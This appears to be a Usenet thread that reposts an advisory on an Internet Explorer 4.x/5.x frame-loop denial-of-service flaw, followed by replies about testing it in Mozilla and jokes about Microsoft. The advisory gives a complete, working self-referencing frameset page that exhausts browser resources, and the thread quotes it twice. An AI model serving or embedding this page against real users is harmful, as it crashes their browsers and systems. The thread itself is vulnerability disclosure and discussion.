Yet Another IE Vulnerability??- Frame Looping

Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability


Microsoft Internet Explorer 4.x

Microsoft Internet Explorer 5.x
Frame Loop Vulnerability




PROBLEM:

It is possible to create a malicious webpage that when visited by an IE
user all of their system resources are devoured and depending on the
system its possible that the machine can even crash and reboot itself.

The reason you can use up all of the client's resources is by creating
an endless loop of frames.

You create a html file that has a few frames inside it and then link
those frames back to the same html file so every time IE loads the new
frame it loads another new frame and another etc...

Until after a short time your resources are all used up and your system
crashes.

We understand this is somewhat of a nuisance hole but still something
that needs to be addressed.

Example:

-----------readme.htm------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<head>
<title>Ussrlabs is getting hard</title>
</head>
<frameset framespacing="2" frameborder="no" rows="65,*">
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<noframes>
<body bgcolor="#FFFFFF">
<p>This web page uses frames, but your browser doesn't support them.</p>
</body>
</noframes>
</frameset>
<frameset>
<noframes>
</noframes>
</frameset>
</html>
-----------readme.htm------------

Or if you want the html can be downloaded here.

http://www.ussrback.com/iehole/readme.zip

Note: It also affect Microsoft FrontPage.

Vendor Status:

Contacted.

"We talked to MS and they said this is a nuisance attack and do not
think its a security hole. So you will not be getting a patch for
this(maybe). However, it is good to know that Netscape Navigator is not
affected by this hole."

Vendor Url: http://www.microsoft.com/

Program Url: http://www.microsoft.com/windows/ie/default.htm

Credit:

USSRLABS

SOLUTION:

Nothing yet.




I made one of those pages (frame-loop-tester.html), placed it in my
webserver's /pub directory, and tested it against Mozilla (because I'm
not crazy enough to run IE) on my Linux box. It did try sucking up
system resources, and with top running in an x-term, the process tried
to use up about 92%, at which time Linux cut it. Nothing appeared on the
browser.



--
-=-=-=-=-=-=-=-=-=Atr2-WBS @ Atr2.Ath.Cx=-=-=-=-=-=-=-=-=-
[jayjwa] Mod_SSL / GPG / OpenSSL
"Save the 'Net, Unplug a Windows machine today!"

=-=-=Linux Tough.Powered By Slackware=-=HTTPS/FTP=-RLF#37=

jayjwa

In article <>,
says...
>
> Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability
>
>
> Microsoft Internet Explorer 4.x
>
> Microsoft Internet Explorer 5.x
> Frame Loop Vulnerability
>
>
>
>
> PROBLEM:
>
> It is possible to create a malicious webpage that when visited by an IE
> user all of their system resources are devoured and depending on the
> system its possible that the machine can even crash and reboot itself.
>
> The reason you can use up all of the client's resources is by creating
> an endless loop of frames.
>
> You create a html file that has a few frames inside it and then link
> those frames back to the same html file so every time IE loads the new
> frame it loads another new frame and another etc...
>
> Until after a short time your resources are all used up and your system
> crashes.
>
> We understand this is somewhat of a nuisance hole but still something
> that needs to be addressed.
>
> Example:
>
> -----------readme.htm------------
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
> <html>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
> <head>
> <title>Ussrlabs is getting hard</title>
> </head>
> <frameset framespacing="2" frameborder="no" rows="65,*">
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <noframes>
> <body bgcolor="#FFFFFF">
> <p>This web page uses frames, but your browser doesn't support them.</p>
> </body>
> </noframes>
> </frameset>
> <frameset>
> <noframes>
> </noframes>
> </frameset>
> </html>
> -----------readme.htm------------
>
> Or if you want the html can be downloaded here.
>
> http://www.ussrback.com/iehole/readme.zip
>
> Note: It also affect Microsoft FrontPage.
>
> Vendor Status:
>
> Contacted.
>
> "We talked to MS and they said this is a nuisance attack and do not
> think its a security hole. So you will not be getting a patch for
> this(maybe). However, it is good to know that Netscape Navigator is not
> affected by this hole."
>
> Vendor Url: http://www.microsoft.com/
>
> Program Url: http://www.microsoft.com/windows/ie/default.htm
>
> Credit:
>
> USSRLABS
>
> SOLUTION:
>
> Nothing yet.
>
>
>
>
> I made one of those pages (frame-loop-tester.html), placed it in my
> webserver's /pub directory, and tested it against Mozilla (because I'm
> not crazy enough to run IE) on my Linux box. It did try sucking up
> system resources, and with top running in an x-term, the process tried
> to use up about 92%, at which time Linux cut it. Nothing appeared on the
> browser.
>
>
>
>



thanks for another example of why IE should be ripped out of Windows and
replaced with something a little less dangerous, like Lynx

go ahead folks, keep running your Fat32 and NTFS as Admin... you're
doing nothing but propagating Microsoft's demise.




--
Colonel Flagg
http://www.internetwarzone.org/

Privacy at a click:
http://www.cotse.net

Q: How many Bill Gates does it take to change a lightbulb?
A: None, he just defines Darkness? as the new industry standard..."

"...I see stupid people."

Colonel Flagg

Colonel Flagg Spilled my beer when they jumped on the table and
proclaimed in <>:
> thanks for another example of why IE should be ripped out of Windows
> and replaced with something a little less dangerous, like Lynx
>
> go ahead folks, keep running your Fat32 and NTFS as Admin... you're
> doing nothing but propagating Microsoft's demise.

Running as Admin is the same as running in root. "If you play in
root you will eventually kill the whole tree" - forget his name but
he's in the c.o.l.s newsgroup... <G>

NOI

Thund3rstruck

jayjwa <> wrote in message news:<>...
> I made one of those pages (frame-loop-tester.html), placed it in my
> webserver's /pub directory, and tested it against Mozilla (because I'm
> not crazy enough to run IE) on my Linux box. It did try sucking up
> system resources, and with top running in an x-term, the process tried
> to use up about 92%, at which time Linux cut it. Nothing appeared on the
> browser.

As a local file, Mozilla on XP Pro (work) loaded the page but stopped.
Didn't lock, didn't die, just finished at some point.

n1pop@hotmail.com

> PROBLEM:
>
> It is possible to create a malicious webpage that when visited by an IE
> user all of their system resources are devoured and depending on the
> system its possible that the machine can even crash and reboot itself.
>
Isn't this IE's default behavior?

Beavis

Beavis wrote:
>>PROBLEM:
>>
>>It is possible to create a malicious webpage that when visited by an IE
>>user all of their system resources are devoured and depending on the
>>system its possible that the machine can even crash and reboot itself.
>>
>
> Isn't this IE's default behavior?

I see lots of Mozilla's but no one tried it on IE yet?


-jayjwa

@micro$oft.com